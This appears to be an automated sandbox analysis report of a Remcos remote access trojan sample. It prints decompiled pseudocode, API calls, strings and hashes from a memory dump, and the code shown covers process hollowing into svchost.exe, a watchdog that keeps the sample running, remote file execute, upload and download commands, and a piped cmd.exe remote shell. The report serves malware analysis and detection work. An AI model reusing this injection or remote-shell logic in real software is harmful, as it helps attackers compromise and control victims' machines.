					L00401FC7();
					L00401FC7();
					goto L15;
				}
				_t592 = _t590 - 1;
				if(_t592 == 0) {
					E0040427F(0x46c238,  &_v256, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
					E00407350(0x46c238, _t602 - 0x18, _t550, __eflags,  &_v260);
					E004061C3();
					__eflags = E00402489() - 2;
					_t316 = E0041733B( &_v228, E00407309( &_v264,  &_v240, 0, E00402489() - 2));
					_t550 = "Browsing directory: ";
					E004075C2(0x46c238, _t602 - 0x18 + 0x18 - 0x18, "Browsing directory: ", _t569, E00402489() - 2, _t316);
					E00402084(0x46c238, _t602 - 0x18 + 0x18 - 4, "[Info]");
					L00416C80(0x46c238, _t569);
					L00401FC7();
					goto L13;
				}
				_t594 = _t592 - 1;
				if(_t594 == 0) {
					E0040427F(0x46c238,  &_v256, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
					ShellExecuteW(0, L"open", L00401EEB( &_v260), 0, 0, 1);
					_t326 = E0041733B( &_v212,  &_v260);
					_t550 = "Executing file: ";
					E004075C2(0x46c238, _t602 - 0x18, "Executing file: ", _t569, __eflags, _t326);
					E00402084(0x46c238, _t602 - 4, "[Info]");
					L00416C80(0x46c238, _t569);
					L00401FC7();
					goto L40;
				} else {
					_t596 = _t594 - 1;
					_t652 = _t596;
					if(_t596 == 0) {
						E004072F6( &_v108);
						_t332 = L00401E49( &_v264, _t550, _t652, 3);
						_t639 = _t602 - 0x18;
						E004020EC(0x46c238, _t639, _t550, _t652, _t332);
						_t334 = L00401E49( &_v272, _t550, _t652, 2);
						_t640 = _t639 - 0x18;
						E004020EC(0x46c238, _t640, _t550, _t652, _t334);
						_t336 = L00401E49( &_v280, _t550, _t652, 1);
						_t641 = _t640 - 0x18;
						E004020EC(0x46c238, _t641, _t550, _t652, _t336);
						_push(L00401F95(L00401E49( &_v288, _t550, _t652, _t596)));
						_t340 = E004064A2( &_v136, _t550);
						_push(_t596);
						_t653 = _t340;
						if(_t340 == 0) {
							E0040427F(0x46c238,  &_v252, L00401F95(L00401E49( &_v368, _t550, __eflags)));
							_t344 = E0041733B( &_v232,  &_v256);
							_t642 = _t641 - 0x18;
							_t550 = "Failed to upload file: ";
							E004075C2(0x46c238, _t642, "Failed to upload file: ", _t569, __eflags, _t344);
							_t542 = _t642 - 0x14;
							_push("[ERROR]");
						} else {
							E0040427F(0x46c238,  &_v252, L00401F95(L00401E49( &_v368, _t550, _t653)));
							_t354 = E0041733B( &_v232,  &_v256);
							_t645 = _t641 - 0x18;
							_t550 = "Uploaded file: ";
							E004075C2(0x46c238, _t645, "Uploaded file: ", _t569, _t653, _t354);
							_t542 = _t645 - 0x14;
							_push("[Info]");
						}
						E00402084(0x46c238, _t542);
						L00416C80(0x46c238, _t569);
						L00401FC7();
						L00401EF0();
						L00407304(0x46c238,  &_v132, _t596);
					}
					goto L41;
				}
			}

0x0040697d
0x0040697d
0x0040698d
0x0040698f
0x00406992
0x00406997
0x0040699f
0x004069b9
0x004069c3
0x004069c8
0x004069d3
0x004069d8
0x004069e5
0x004069ee
0x004069f8
0x004069fb
0x004069fd
0x00406fad
0x00406fad
0x00406fb3
0x00407198
0x004071a7
0x004071b1
0x004071b3
0x004071c9
0x004071b5
0x004071bc
0x004071bc
0x004071cf
0x004071d8
0x004071da
0x00407201
0x00407206
0x0040720b
0x00407212
0x0040721f
0x00407224
0x00407227
0x0040722f
0x00407234
0x00407237
0x00407239
0x004071dc
0x004071e0
0x004071e5
0x004071e8
0x004071f0
0x004071f5
0x004071f8
0x004071fa
0x004071fa
0x0040723e
0x00407243
0x00407248
0x0040724f
0x0040725a
0x0040725f
0x00407264
0x00407266
0x0040726b
0x0040726d
0x004072c4
0x004072c8
0x004072cd
0x004072d1
0x004072dd
0x004072e6
0x004072f3
0x0040726f
0x0040727a
0x00407280
0x00407287
0x0040729a
0x004072a3
0x004072b7
0x004072bc
0x004072bc
0x00000000
0x004072c1
0x0040726d
0x00406fb9
0x00406fb9
0x00406fbc
0x00407097
0x004070b3
0x004070cf
0x004070e9
0x004070f9
0x00407108
0x0040710a
0x0040710f
0x0040710f
0x00407112
0x00407150
0x00407154
0x0040715a
0x00407161
0x0040716a
0x00407114
0x00407117
0x00407122
0x00407128
0x0040712d
0x00407173
0x00406c5f
0x00406c5f
0x00000000
0x00406c5f
0x00406fc2
0x00406fc2
0x00406fc5
0x00407022
0x00407035
0x0040703b
0x00407051
0x0040705b
0x00407066
0x00407075
0x00000000
0x00407075
0x00406fc7
0x00406fc7
0x00406fca
0x00406fe2
0x00406ffc
0x00407000
0x00407000
0x00000000
0x00406fca
0x00406a03
0x00406d53
0x00406d61
0x00406d77
0x00406d78
0x00406d79
0x00406d7a
0x00406d7b
0x00406d86
0x00406d8b
0x00406d98
0x00406dd2
0x00406de1
0x00406dea
0x00406df3
0x00406dfc
0x00406e19
0x00406e26
0x00406e2b
0x00406e36
0x00406e3b
0x00406e46
0x00406e4b
0x00406e57
0x00406e60
0x00406e71
0x00406e76
0x00406e7c
0x00406ea8
0x00406ead
0x00406eb4
0x00406eb5
0x00406eb7
0x00406f41
0x00406f4e
0x00406f56
0x00406f5e
0x00406f6d
0x00406f72
0x00406f7e
0x00406f87
0x00406eb9
0x00406eca
0x00406ed7
0x00406edf
0x00406ee7
0x00406ef2
0x00406ef7
0x00406f03
0x00406f0c
0x00406f1b
0x00406f20
0x00406f29
0x00406f29
0x00406f93
0x00406f9f
0x00406cff
0x00406cff
0x00000000
0x00406cff
0x00406a09
0x00406a0c
0x00406d21
0x00406d2c
0x00406d39
0x00406d3e
0x00406d42
0x00000000
0x00406d47
0x00406a12
0x00406a15
0x00406c73
0x00406c87
0x00406c9e
0x00406ca4
0x00406cb3
0x00406cbc
0x00406cd3
0x00406cd7
0x00406cdd
0x00406ce4
0x00406ced
0x00406cf6
0x00000000
0x00406cfb
0x00406a1b
0x00406a1e
0x00406be8
0x00406bf7
0x00406bfc
0x00406c0d
0x00406c26
0x00406c2e
0x00406c36
0x00406c45
0x00406c4a
0x00406c56
0x00000000
0x00406c5b
0x00406a24
0x00406a27
0x00406b6f
0x00406b88
0x00406b96
0x00406b9e
0x00406ba6
0x00406bb5
0x00406bba
0x00406bc6
0x00000000
0x00406a2d
0x00406a2d
0x00406a2d
0x00406a30
0x00406a3d
0x00406a48
0x00406a4d
0x00406a53
0x00406a5e
0x00406a63
0x00406a69
0x00406a74
0x00406a79
0x00406a7f
0x00406a95
0x00406a9d
0x00406aa6
0x00406aa7
0x00406aa9
0x00406afb
0x00406b08
0x00406b0d
0x00406b10
0x00406b18
0x00406b20
0x00406b22
0x00406aab
0x00406abc
0x00406ac9
0x00406ace
0x00406ad1
0x00406ad9
0x00406ae1
0x00406ae3
0x00406ae3
0x00406b27
0x00406b2c
0x00406b38
0x00406b41
0x00406b4d
0x00406b4d
0x00000000
0x00406a30

APIs

SetEvent.KERNEL32(?,?), ref: 0040699F
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406B88

Part of subcall function 004064A2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004064ED

Part of subcall function 004062D8: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 00406331
Part of subcall function 004062D8: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 00406379
Part of subcall function 004062D8: CloseHandle.KERNEL32(00000000), ref: 004063B3
Part of subcall function 004062D8: MoveFileW.KERNEL32(00000000,00000000), ref: 004063CB

Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F

GetLogicalDriveStringsA.KERNEL32 ref: 00406C73
StrToIntA.SHLWAPI(00000000,?), ref: 00406FE2
CreateDirectoryW.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 00407051

Part of subcall function 004061C3: FindFirstFileW.KERNEL32(00000000,?), ref: 004061DE

Strings

[ERROR], xrefs: 00406B22, 00406F68, 00407239
Uploaded file: , xrefs: 00406AD1
Unable to rename file!, xrefs: 0040713B
Unable to delete: , xrefs: 00407227
open, xrefs: 00406B82
Downloaded file: , xrefs: 00406EDF
Failed to download file: , xrefs: 00406F56
Deleted file: , xrefs: 004071E8
Failed to upload file: , xrefs: 00406B10
Downloading file: , xrefs: 00406E2E
Browsing directory: , xrefs: 00406C2E
Executing file: , xrefs: 00406B9E
[Info], xrefs: 00406AE3, 00406BB0, 00406C40, 00406E3E, 00406E45, 00406EF1, 004071FA

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$Create$CloseDirectoryDriveEventExecuteFindFirstHandleLocalLogicalMoveShellStringsTimeWritechar_traitssend
String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Failed to upload file: $Unable to delete: $Unable to rename file!$Uploaded file: $[ERROR]$[Info]$open
API String ID: 4189642951-1986272625
Opcode ID: ab6d4a0e0f6d1058e14c64d1ee1328a7321297c8dc113bf4ca18e63fc18b8880
Instruction ID: 2a12d23acd30ce868743ee3b5d09fdf4f29f8ef519bcce84dbcc6bced154e8ad
Opcode Fuzzy Hash: ab6d4a0e0f6d1058e14c64d1ee1328a7321297c8dc113bf4ca18e63fc18b8880
Instruction Fuzzy Hash: BD3292716183015BC608F776C8569AF77A9AF91348F40093FF942671E3EF389A09C69B

Uniqueness

Uniqueness Score: -1.00%

Function 0041412B, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041412B(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4) {
				void _v8;
				signed int _v12;
				void* _v16;
				CONTEXT* _v20;
				WCHAR* _v24;
				struct _STARTUPINFOW _v92;
				void* __edi;
				void* _t58;
				void* _t72;
				void* _t73;
				int _t83;
				intOrPtr* _t95;
				void* _t98;
				signed int _t102;
				void* _t104;
				void* _t106;
				CONTEXT* _t110;
				void* _t113;
				CONTEXT* _t114;
				struct _PROCESS_INFORMATION* _t116;

				_v8 = _v8 & 0x00000000;
				_v16 = __edx;
				_v24 = __ecx;
				if( *__edx == 0x5a4d) {
					_t95 =  *((intOrPtr*)(__edx + 0x3c)) + __edx;
					if( *_t95 == 0x4550) {
						_push(_t106);
						L00431F00(_t106,  &_v92, 0, 0x44);
						_t116 = _a4;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						if(CreateProcessW(0, _v24, 0, 0, 0, 4, 0, 0,  &_v92, _t116) == 0) {
							L21:
							_t58 = 0;
							L22:
							L23:
							return _t58;
						}
						CloseHandle(_v92.hStdInput);
						CloseHandle(_v92.hStdOutput);
						CloseHandle(_v92.hStdError);
						_t110 = VirtualAlloc(0, 4, 0x1000, 4);
						_v20 = _t110;
						_t110->ContextFlags = 0x10007;
						_t14 =  &(_t116->hThread); // 0xffffdcf2
						if(GetThreadContext( *_t14, _t110) == 0 || ReadProcessMemory(_t116->hProcess, _t110->Ebx + 8,  &_v8, 4, 0) == 0) {
							L20:
							TerminateProcess(_t116->hProcess, 0);
							CloseHandle(_t116->hProcess);
							_t50 =  &(_t116->hThread); // 0xffffdcf2
							CloseHandle( *_t50);
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							goto L21;
						} else {
							_t72 = _v8;
							if(_t72 ==  *(_t95 + 0x34)) {
								NtUnmapViewOfSection(_t116->hProcess, _t72);
							}
							_t73 = VirtualAllocEx(_t116->hProcess,  *(_t95 + 0x34),  *(_t95 + 0x50), 0x3000, 0x40);
							_v24 = _t73;
							if(_t73 == 0) {
								goto L20;
							} else {
								_t113 = _v16;
								if(WriteProcessMemory(_t116->hProcess, _t73, _t113,  *(_t95 + 0x54), 0) == 0) {
									goto L20;
								}
								_v12 = _v12 & 0x00000000;
								if(0 >=  *(_t95 + 6)) {
									L14:
									_t98 = _t95 + 0x34;
									_t114 = _v20;
									if(_v8 ==  *_t98) {
										L17:
										_t114->Eax =  *((intOrPtr*)(_t95 + 0x28)) + _v24;
										_t48 =  &(_t116->hThread); // 0xffffdcf2
										if(SetThreadContext( *_t48, _t114) == 0) {
											goto L20;
										}
										_t49 =  &(_t116->hThread); // 0xffffdcf2
										if(ResumeThread( *_t49) == 0xffffffff) {
											goto L20;
										}
										_t58 = 1;
										goto L22;
									}
									_t83 = WriteProcessMemory(_t116->hProcess, _t114->Ebx + 8, _t98, 4, 0);
									if(_t83 != 0) {
										goto L17;
									}
									TerminateProcess(_t116->hProcess, _t83);
									goto L21;
								}
								_t104 = 0;
								_v16 = 0;
								do {
									_t28 = _t113 + 0x3c; // 0x83ffc983
									WriteProcessMemory( *_t116,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x104)) + _v24,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x10c)) + _t113,  *( *_t28 + _t104 + _t113 + 0x108), 0);
									_t37 =  &_v16; // 0x41433b
									_t102 = _v12 + 1;
									_t104 =  *_t37 + 0x28;
									_v12 = _t102;
									_v16 = _t104;
								} while (_t102 < ( *(_t95 + 6) & 0x0000ffff));
								goto L14;
							}
						}
					}
					_t58 = 0;
					goto L23;
				}
				return 0;
			}

0x00414131
0x0041413a
0x0041413d
0x00414143
0x00414150
0x00414158
0x00414162
0x0041416b
0x00414170
0x0041417a
0x0041417c
0x0041417d
0x0041417e
0x00414198
0x00414322
0x00414322
0x00414324
0x00414326
0x00000000
0x00414326
0x004141a7
0x004141ac
0x004141b1
0x004141c4
0x004141c7
0x004141ca
0x004141d0
0x004141db
0x00414301
0x00414305
0x00414313
0x00414315
0x00414318
0x0041431e
0x0041431f
0x00414320
0x00414321
0x00000000
0x00414203
0x00414203
0x00414209
0x0041420e
0x0041420e
0x00414223
0x00414229
0x0041422e
0x00000000
0x00414234
0x00414234
0x00414248
0x00000000
0x00000000
0x0041424e
0x00414258
0x004142a2
0x004142a5
0x004142a8
0x004142ad
0x004142d5
0x004142dc
0x004142e2
0x004142ed
0x00000000
0x00000000
0x004142ef
0x004142fb
0x00000000
0x00000000
0x004142fd
0x00000000
0x004142fd
0x004142c0
0x004142c8
0x00000000
0x00000000
0x004142cd
0x00000000
0x004142cd
0x0041425a
0x0041425c
0x0041425f
0x0041425f
0x00414284
0x0041428d
0x00414290
0x00414295
0x00414298
0x0041429b
0x0041429e
0x00000000
0x0041425f
0x0041422e
0x004141db
0x0041415a
0x00000000
0x0041415a
0x00000000

Strings

;CA, xrefs: 0041428D

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: ;CA
API String ID: 0-233881251
Opcode ID: 14ea15bd37de55cb440a8d85a26c650e3b8200264586c93c0b4e6515a21e5717
Instruction ID: bd197fad053dbfc90d5835daa1a59b9970fe7a36a364e2f4af16486f2ac585b0
Opcode Fuzzy Hash: 14ea15bd37de55cb440a8d85a26c650e3b8200264586c93c0b4e6515a21e5717
Instruction Fuzzy Hash: 09518D70600604BFEB108FA5CC45FAABBB9FF84742F144065FA54E62A1C775D990DB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040FAC7, Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 194
threadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040FAC7(void* __eflags) {
				char _v28;
				char _v36;
				void* _v40;
				char _v56;
				void* _v64;
				char _v76;
				char _v84;
				void* _v88;
				char _v100;
				char _v104;
				void* _v108;
				char _v124;
				char _v128;
				long _v132;
				char _v148;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t26;
				void* _t29;
				void* _t35;
				void* _t46;
				void* _t61;
				void* _t78;
				void* _t107;
				long _t112;
				long _t141;
				void* _t142;
				CHAR* _t143;
				void* _t145;
				signed int _t147;
				void* _t149;
				void* _t155;

				_t149 = (_t147 & 0xfffffff8) - 0x7c;
				_push(_t142);
				_t26 = GetCurrentProcessId();
				if(L00410BB0(0x46c518, L00401F95(0x46c518), "WD", _t26) != 0) {
					_t29 = OpenMutexA(0x100000, 0, "Mutex_RemWatchdog");
					__eflags = _t29;
					if(_t29 == 0) {
						E004020D5(0x46c518,  &_v100);
						E004179DC(L00401EEB(0x46c500),  &_v100);
						L00401F6D(0x46c518,  &_v124);
						__eflags = E00417614( &_v124);
						if(__eflags != 0) {
							_t35 = E0040427F(0x46c518,  &_v76, L"\\SysWOW64");
							L00401EFA( &_v132, _t37, _t142, E00403030( &_v36, E0040427F(0x46c518,  &_v56, E0043987F(0x46c518,  &_v76, __eflags, L"WinDir")), _t35));
							L00401EF0();
							L00401EF0();
						} else {
							_t61 = E0040427F(0x46c518,  &_v28, L"\\system32");
							L00401EFA( &_v132, _t63, _t142, E00403030( &_v84, E0040427F(0x46c518,  &_v56, E0043987F(0x46c518,  &_v28, __eflags, L"WinDir")), _t61));
							L00401EF0();
							L00401EF0();
						}
						L00401EF0();
						E0040766C(0x46c518,  &_v124, 0, L"\\svchost.exe");
						_t143 = L00401F95( &_v104);
						_t46 = E0041412B(L00401EEB( &_v128), _t143, 0x46bd50);
						_t150 = _t149 - 0x18;
						_t107 = _t149 - 0x18;
						__eflags = _t46;
						if(_t46 != 0) {
							E00402084(0x46c518, _t107, "Watchdog module activated");
							E00402084(0x46c518, _t150 - 0x18, "[Info]");
							L00416C80(0x46c518, 0);
							Sleep(0x7d0);
							_t112 =  *0x46bd58; // 0x0
							goto L13;
						}
						E00402084(0x46c518, _t107, "Watchdog launch failed!");
						E00402084(0x46c518, _t150 - 0x18, "[ERROR]");
						L00416C80(0x46c518, 0);
						CloseHandle( *0x46bd60);
						L00401EF0();
						L00401FC7();
						_push(3);
						_pop(1);
					} else {
						CloseHandle(_t29);
						_t155 = _t149 - 0x18;
						E00402084(0x46c518, _t155, "Remcos restarted by watchdog!");
						_t156 = _t155 - 0x18;
						E00402084(0x46c518, _t155 - 0x18, "[Info]");
						L00416C80(0x46c518, 0);
						E00402084(0x46c518, _t156 + 0x18, "Watchdog module activated");
						E00402084(0x46c518, _t156 + 0x18 - 0x18, "[Info]");
						L00416C80(0x46c518, 0);
						CreateThread(0, 0, E004100F9, 0, 0, 0);
						_t143 = "WDH";
						_t78 = E00410885(L00401F95(0x46c518), _t143,  &_v148);
						__eflags = _t78;
						if(_t78 == 0) {
							goto L1;
						} else {
							 *0x46bd50 = OpenProcess(0x1fffff, 0, _v132);
							L00410CE2(L00401F95(0x46c518), __eflags, _t143);
							_t112 = _v132;
							L13:
							L14();
							asm("int3");
							_push(_t143);
							_push(0);
							_t141 = _t112;
							L15:
							_t145 = OpenProcess(0x100000, 0, _t141);
							WaitForSingleObject(_t145, 0xffffffff);
							CloseHandle(_t145);
							__eflags =  *0x46bd4e;
							if(__eflags != 0) {
								E0040FAC7(__eflags, 0);
							}
							goto L15;
						}
						L17:
					}
				} else {
					L1:
				}
				return 1;
				goto L17;
			}

0x0040facd
0x0040fad1
0x0040fad3
0x0040faf6
0x0040fb0d
0x0040fb13
0x0040fb15
0x0040fba4
0x0040fbb9
0x0040fbc2
0x0040fbcc
0x0040fbce
0x0040fc2b
0x0040fc57
0x0040fc60
0x0040fc69
0x0040fbd0
0x0040fbd9
0x0040fc05
0x0040fc0e
0x0040fc17
0x0040fc1c
0x0040fc72
0x0040fc80
0x0040fc97
0x0040fca2
0x0040fca8
0x0040fcab
0x0040fcad
0x0040fcaf
0x0040fcb6
0x0040fcc5
0x0040fcca
0x0040fcd7
0x0040fcdd
0x00000000
0x0040fcdd
0x0040fcea
0x0040fcf9
0x0040fcfe
0x0040fd0c
0x0040fd16
0x0040fd1f
0x0040fd24
0x0040fd26
0x0040fb1b
0x0040fb1c
0x0040fb22
0x0040fb2c
0x0040fb31
0x0040fb3c
0x0040fb41
0x0040fb50
0x0040fb5b
0x0040fb60
0x0040fb72
0x0040fb7c
0x0040fb8c
0x0040fb93
0x0040fb95
0x00000000
0x0040fb9b
0x0040fd43
0x0040fd4f
0x0040fd55
0x0040fd59
0x0040fd59
0x0040fd5e
0x0040fd5f
0x0040fd60
0x0040fd61
0x0040fd63
0x0040fd71
0x0040fd76
0x0040fd7d
0x0040fd83
0x0040fd8a
0x0040fd8e
0x0040fd8e
0x00000000
0x0040fd8a
0x00000000
0x0040fb95
0x0040faf8
0x0040faf8
0x0040fafa
0x0040fd2d
0x00000000

APIs

GetCurrentProcessId.KERNEL32 ref: 0040FAD3

Part of subcall function 00410BB0: RegCreateKeyA.ADVAPI32(80000001,00000000,0045F6BC), ref: 00410BBE
Part of subcall function 00410BB0: RegSetValueExA.ADVAPI32(0045F6BC,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040A669,0045FEF8,00000001,000000AF,0045F6BC), ref: 00410BD9
Part of subcall function 00410BB0: RegCloseKey.ADVAPI32(0045F6BC,?,?,?,0040A669,0045FEF8,00000001,000000AF,0045F6BC), ref: 00410BE4

OpenMutexA.KERNEL32 ref: 0040FB0D
CloseHandle.KERNEL32(00000000), ref: 0040FB1C
CreateThread.KERNEL32 ref: 0040FB72
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040FD3A

Strings

[ERROR], xrefs: 0040FCF4
WinDir, xrefs: 0040FBDF, 0040FC31
\svchost.exe, xrefs: 0040FC77
Mutex_RemWatchdog, xrefs: 0040FB00
\system32, xrefs: 0040FBD0
\SysWOW64, xrefs: 0040FC22
Watchdog module activated, xrefs: 0040FB4B, 0040FCB1
Watchdog launch failed!, xrefs: 0040FCE5
WDH, xrefs: 0040FB7C, 0040FB82, 0040FD40
[Info], xrefs: 0040FB34, 0040FB3B, 0040FB5A, 0040FCC0
Remcos restarted by watchdog!, xrefs: 0040FB27

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
String ID: Mutex_RemWatchdog$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[Info]$\SysWOW64$\svchost.exe$\system32
API String ID: 3018269243-3797382479
Opcode ID: 05e8c219c4dea432a12226232b0cf6631131a0ac3a866d2b262575c3da184e56
Instruction ID: b085b79558e0c22ee18e78a7f4af536a5d5efbf70cd450b3fa531ddec726aa5e
Opcode Fuzzy Hash: 05e8c219c4dea432a12226232b0cf6631131a0ac3a866d2b262575c3da184e56
Instruction Fuzzy Hash: 545120316043015BC218BB72CC1B8AF37699E91749F50043FF946721E2EE789909C6AF

Uniqueness

Uniqueness Score: -1.00%

Function 004055EA, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 283
pipesleepfileCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E004055EA(char _a4) {
				long _v8;
				long _v12;
				long _v16;
				char _v40;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t52;
				void* _t56;
				void* _t66;
				void* _t70;
				void* _t79;
				CHAR* _t80;
				int _t98;
				intOrPtr* _t107;
				intOrPtr _t138;
				signed int _t146;
				signed int _t147;
				long _t151;
				void* _t155;
				intOrPtr* _t156;
				void* _t163;
				void* _t168;
				void* _t175;

				_t156 = _t155 - 0x3c;
				_push(_t146);
				_t138 =  *((intOrPtr*)( *[fs:0x2c]));
				_t147 = _t146 | 0xffffffff;
				_t98 = 0;
				if( *0x46dce8 >  *((intOrPtr*)(_t138 + 4))) {
					E0042F114(0x46dce8);
					_t160 =  *0x46dce8 - _t147;
					if( *0x46dce8 == _t147) {
						E0040484E(0, 0x46dc60, 0);
						E0042F49E(_t160, E004527B3);
						 *_t156 = 0x46dce8;
						E0042F0D5(_t147);
					}
				}
				if( *0x46dcc8 >  *((intOrPtr*)(_t138 + 4))) {
					E0042F114(0x46dcc8);
					_t162 =  *0x46dcc8 - _t147;
					if( *0x46dcc8 == _t147) {
						E004020D5(_t98, 0x46dcf0);
						E0042F49E(_t162, E004527A9);
						E0042F0D5(_t147, 0x46dcc8);
					}
				}
				_t100 =  &_v40;
				E004020D5(_t98,  &_v40);
				_t139 = 0x46c2d0;
				_v8 = _t98;
				_t163 =  *0x46bae2 - _t98; // 0x0
				if(_t163 != 0) {
					L12:
					_v12 = _t98;
					PeekNamedPipe( *0x46dcd0, _t98, _t98, _t98,  &_v12, _t98);
					if(_v12 <= _t98) {
						_t156 = _t156 - 0x18;
						E00402084(_t98, _t156, 0x45f6bc);
						_push(0x62);
						_t147 = L00404AA4(_t98, 0x46dc60, _t136, __eflags);
						goto L21;
					}
					_push(_v12);
					_t56 = E004394F6(_t100);
					_t140 = _t56;
					ReadFile( *0x46dcd0, _t56, _v12,  &_v16, _t98);
					if(_v16 <= _t98) {
						L19:
						L004394F1(_t140);
						_t139 = 0x46c2d0;
						goto L21;
					}
					if(_v8 <= _t98) {
						L17:
						E00402084(_t98,  &_v64, _t140);
						_t156 = _t156 - 0x18;
						_t107 = _t156;
						_push(_v16);
						_push(_t98);
						L18:
						E00405A14(_t98, _t107, _t136, _t172);
						_t147 = L00404AA4(_t98, 0x46dc60, _t136, _t172, 0x62,  &_v64);
						L00401FC7();
						goto L19;
					}
					_t66 = E00439510(_t140, L00401F95( &_v40), _v8);
					_t156 = _t156 + 0xc;
					_t172 = _t66;
					if(_t66 != 0) {
						goto L17;
					}
					E00402084(_t98,  &_v64, _t140);
					_t156 = _t156 - 0x18;
					_t107 = _t156;
					_push(_v16 - _v8);
					_push(_v8);
					goto L18;
				} else {
					_t136 = "cmd.exe";
					_t70 = E00405A6F("cmd.exe");
					_t164 = _t70;
					if(_t70 == 0) {
						L26:
						L00404E0B(0x46dc60);
						CloseHandle( *0x46dcd0);
						CloseHandle( *0x46dcec);
						 *0x46bae2 = _t98;
						_t98 = 1;
						L27:
						L00401FC7();
						L00401FC7();
						return _t98;
					}
					E00405A0B(_t98, 0x46dcf0, E0043988A(_t98, _t164, "SystemDrive"));
					E00405A02(_t98, 0x46dcf0, 0x46c2d0, "\\");
					0x46dc08->nLength = 0xc;
					 *0x46dc10 = 1;
					 *0x46dc0c = _t98;
					if(CreatePipe(0x46dce4, 0x46dccc, 0x46dc08, _t98) == 0 || CreatePipe(0x46dcd0, 0x46dcec, 0x46dc08, _t98) == 0) {
						goto L27;
					} else {
						_t151 = 0x44;
						L00431F00(0x46dc18, 0x46dc18, _t98, CreatePipe);
						0x46dc18->cb = _t151;
						 *0x46dc44 = 0x101;
						 *0x46dc48 = 0;
						 *0x46dc50 =  *0x46dce4;
						_t79 =  *0x46dcec;
						 *0x46dc54 = _t79;
						 *0x46dc58 = _t79;
						_t80 = L00401F95(0x46dcf0);
						 *0x46bae2 = CreateProcessA(_t98, L00401F95(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc18, 0x46dcd4) != 0;
						E00405A0B(_t98, 0x46c2d0, 0x45f6bc);
						 *0x46bae3 = 1;
						E0040498B(0x46dc60);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						E00404A08("cmd.exe");
						_t156 = _t156 + 0xc - 0xfffffffffffffff8;
						E004020EC(_t98, _t156, "cmd.exe", CreateProcessA(_t98, L00401F95(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc18, 0x46dcd4),  &_a4);
						_push(0x93);
						_t100 = 0x46dc60;
						_t147 = L00404AA4(_t98, 0x46dc60, "cmd.exe", CreateProcessA(_t98, L00401F95(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc18, 0x46dcd4));
						Sleep(0x12c);
						_t168 =  *0x46bae2 - _t98; // 0x0
						if(_t168 == 0) {
							goto L26;
						}
						_t139 = 0x46c2d0;
						do {
							goto L12;
							L21:
							_t38 =  <=  ? 0 :  *0x46bae3 & 0x000000ff;
							_t100 = _t139;
							 *0x46bae3 =  <=  ? 0 :  *0x46bae3 & 0x000000ff;
							if(E00402489() == 0) {
								_v8 = _t98;
							} else {
								E00405A02(_t98, _t139, _t139, "\n");
								L00401FAD( &_v40, _t139);
								_t52 = E00402489();
								WriteFile( *0x46dccc, L00401F95(_t139), _t52,  &_v8, _t98);
								_t100 = _t139;
								E00405A0B(_t98, _t139, 0x45f6bc);
							}
							Sleep(0x64);
							_t175 =  *0x46bae3 - _t98; // 0x0
						} while (_t175 != 0);
						TerminateProcess(0x46dcd4->hProcess, _t98);
						CloseHandle( *0x46dcd8);
						CloseHandle( *0x46dcd4);
						goto L26;
					}
				}
			}

0x004055f3
0x004055f7
0x004055f9
0x004055fb
0x00405603
0x0040560b
0x00405612
0x00405618
0x0040561e
0x00405626
0x00405630
0x00405635
0x0040563c
0x00405641
0x0040561e
0x0040564d
0x00405655
0x0040565b
0x00405661
0x00405668
0x00405672
0x00405679
0x0040567e
0x00405661
0x0040567f
0x00405682
0x00405687
0x0040568c
0x0040568f
0x00405695
0x0040580b
0x0040580f
0x0040581c
0x00405825
0x004058c7
0x004058d1
0x004058d6
0x004058e2
0x00000000
0x004058e2
0x0040582b
0x0040582e
0x00405835
0x00405845
0x0040584e
0x004058b9
0x004058ba
0x004058c0
0x00000000
0x004058c0
0x00405853
0x00405888
0x0040588c
0x00405891
0x00405894
0x00405896
0x00405899
0x0040589a
0x0040589e
0x004058b2
